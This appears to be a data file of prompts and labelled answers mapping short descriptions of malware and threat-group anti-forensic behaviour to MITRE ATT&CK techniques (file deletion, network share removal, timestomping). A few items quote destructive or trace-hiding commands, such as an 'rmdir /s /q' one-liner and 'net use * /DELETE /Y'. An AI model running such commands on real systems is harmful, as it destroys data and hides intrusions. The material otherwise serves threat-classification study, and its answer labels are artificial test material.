+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The JHUHUGIT dropper can delete itself from the victim. Another JHUHUGIT variant has the capability to delete specified files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN's installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE has the capability to delete files off the victim’s machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI can delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar can delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can delete files created on the victim's machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk has the ability to quit and delete itself.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kivars has the ability to uninstall malware from the infected host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Komplex trojan supports file deletion.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron has a function to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linfo creates a backdoor through which remote attackers can delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke can securely delete files by first writing random data to the file.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LockerGoga has been observed deleting its original launcher after execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot will delete its dropped files after bypassing UAC.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack removes itself after execution and can delete files on the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner deleted installation files after completion.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Once loaded into memory, MESSAGETAP deletes the keyword_parm.txt and parm.txt configuration files from disk.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MURKYTOP has the capability to delete local files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can delete itself from the compromised computer.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacSpy deletes any temporary files it creates,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Once a file is uploaded, Machete will delete it from the machine.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has deleted itself from the system after execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor will delete the folder containing malicious scripts if it detects the hostname as `PIS-APP`, `PIS-MOB`, `WSUSPROXY`, or `PIS-DB`.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can delete files via `C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 1 -w 3000 > Nul & rmdir /s /q`.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat is capable of deleting the backdoor file.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind can delete itself or specified files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs can remove itself from a system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mori can delete its DLL file and related files by Registry value.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito deletes files using DeleteFileW API call.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI can delete files to cover tracks.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu launches a script to delete their original decoy file to cover tracks.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae has the ability to delete files and directories.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has a command to delete a file from the system. OSX_OCEANLOTUS.D deletes the app bundle and dropper after execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OceanSalt can delete files from the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum's backdoor deletes files after they have been successfully uploaded to C2 servers.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE has the capability to delete files and scripts from the victim's machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel can delete itself following the successful execution of a follow-on payload.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell can delete scripts from a subdirectory of /tmp after they are run.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has the ability to delete files on the compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS can delete all files on the C:\, D:\, E:\ and, F:\ drives using PowerShell Remove-Item commands.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY can delete files written to disk.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pasam creates a backdoor through which remote attackers can delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pay2Key can remove its log file from disk.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has deleted its files and components from a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can delete downloaded executables after running them.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has deleted the filepath %APPDATA%\Intel\devmonsrv.exe.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has the ability to overwrite scripts and delete itself if a sandbox environment is detected.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has used scripts to delete itself after execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke has a command to write random data across a file and delete it.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has the ability to remove all files created during the dropper process.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After encrypting its own log files, the log encryption module in Prikormka deletes the original, unencrypted files from the host.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ProLock can remove files containing its payload after they are executed.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton removes all files in the /tmp directory.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc can delete files indicated by the attacker and remove itself from disk using a batch file.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt will remove all created artifacts such as dropped executables.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has deleted batch files after execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT has a command to delete its Registry key and scheduled task.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can delete folders and files including overwriting its executable with legitimate programs.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can remove files from a targeted system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT can issue SOAP requests to delete already processed C2 emails. RDAT can also delete itself from the infected system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDFSNIFFER has the capability of deleting local files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can mark its binary code for deletion after reboot.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can request to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can delete all files created during its execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay has the ability to uninstall itself by deleting its service and files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver deletes the original dropped file from the victim.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can delete specified files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun can delete files and artifacts it creates.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RunningRAT contains code to delete files from the victim’s machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type has deleted files it has created on a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to delete files from a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDelete deletes data in a way that makes it unrecoverable.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can remove files from the compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SQLRat has used been observed deleting scripts once used.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST had a command to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Following the successful injection of SUNBURST, SUNSPOT deleted a temporary file it created named InventoryManager.bk after restoring the original SolarWinds Orion source code to the software library.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot can run a batch script named `del.bat` to remove any Saint Bot payload-linked files from a compromise system if anti-analysis or locale checks fail.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Sakula samples use cmd.exe to delete temporary files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SamSam has been seen deleting its own files and payloads to make analysis of the attack more difficult.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke can securely delete files, including deleting itself from the victim.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt has a command to delete a specified file.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper has a module to delete itself from the infected machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can delete files downloaded to the compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.","Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot will delete itself if a certain server response is received.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has the ability to run cancel or closeanddeletestorage to remove all files from storage and delete the storage temp file on a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp deletes files to remove evidence on the machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has been observed deleting the temporary files once they fulfill their task.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can self delete to cover its tracks.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can delete previously exfiltrated files from the compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet uses an RPC server that contains a routine for file deletion and also removes itself from the system through a DLL export by deleting specific files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can delete its configuration file from the targeted system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can delete files from a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TDTESS creates then deletes log files during installation of itself as a service.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME can delete files off the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can use DeleteFileA to remove files from infected hosts.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany has used plugins with a self-delete capability.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer has several commands to delete files associated with the malware from the victim.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can run a `Clear Agents Track` command on an infected machine to delete Uroburos-related logs.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has deleted data staged in tmp files after exfiltration.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VBShower has attempted to complicate forensic analysis by deleting all the files contained in %APPDATA%\..\Local\Temporary Internet Files\Content.Word and %APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN can delete files on the victim’s machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer can delete files and itself after infection to avoid analysis.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINDSHIELD is capable of file deletion along with other file system interaction.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can delete tools from a compromised host after execution.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail has the ability to receive and execute a self-delete command.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wingbird deletes its payload along with the payload's parent process after it finishes copying files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can delete the DLLs for its various components from a compromised host.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT has the ability to delete itself from disk by creating a suspended notepad process and writing shellcode to delete a file into the suspended process using `NtWriteVirtualMemory`.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy has a command to delete files and directories.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda has a command to delete a file. It also can uninstall scripts and delete files to cover its track.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can delete files from the system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 can delete files and folders from compromised machines.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: cmd can be used to delete files from the file system.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has the capability to to delete files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT has a function to delete files from the victim’s machine.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain has deleted collected items after uploading the content to its C2 server.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT is capable of deleting files.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: pngdowner deletes content from C2 communications that was saved to the user's temporary directory.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell has deleted itself after creating a service as well as deleted a temporary file when the system reboots.,"Tecnique: T1070.004 Indicator Removal: File Deletion, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection.","Tecnique: T1070.005 Indicator Removal: Network Share Connection Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can disconnect previously connected remote drives.,"Tecnique: T1070.005 Indicator Removal: Network Share Connection Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The net use \\system\share /delete command can be used in Net to remove an established connection to a network share.,"Tecnique: T1070.005 Indicator Removal: Network Share Connection Removal, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RobbinHood disconnects all network shares from the computer with the command net use * /DELETE /Y.,"Tecnique: T1070.005 Indicator Removal: Network Share Connection Removal, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used timestomping to modify the $STANDARD_INFORMATION attribute on tools.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors changed timestamps of multiple files on compromised Ivanti Secure Connect VPNs to conceal malicious activity.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 modified timestamps of backdoors to match legitimate Windows files.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has performed timestomping on victim files.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, APT32 has used a random value to modify the timestamp of the file storing the clientID.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has modified file timestamps.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used a Windows version of the Linux touch command to modify the date and time stamp on DLLs.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has manipulated timestamps for creation or compilation dates to defeat anti-forensics.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.","Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has changed the time stamp of certain files.,"Tecnique: T1070.006 Indicator Removal: Timestomp, Tactic: TA0005 Defense Evasion"
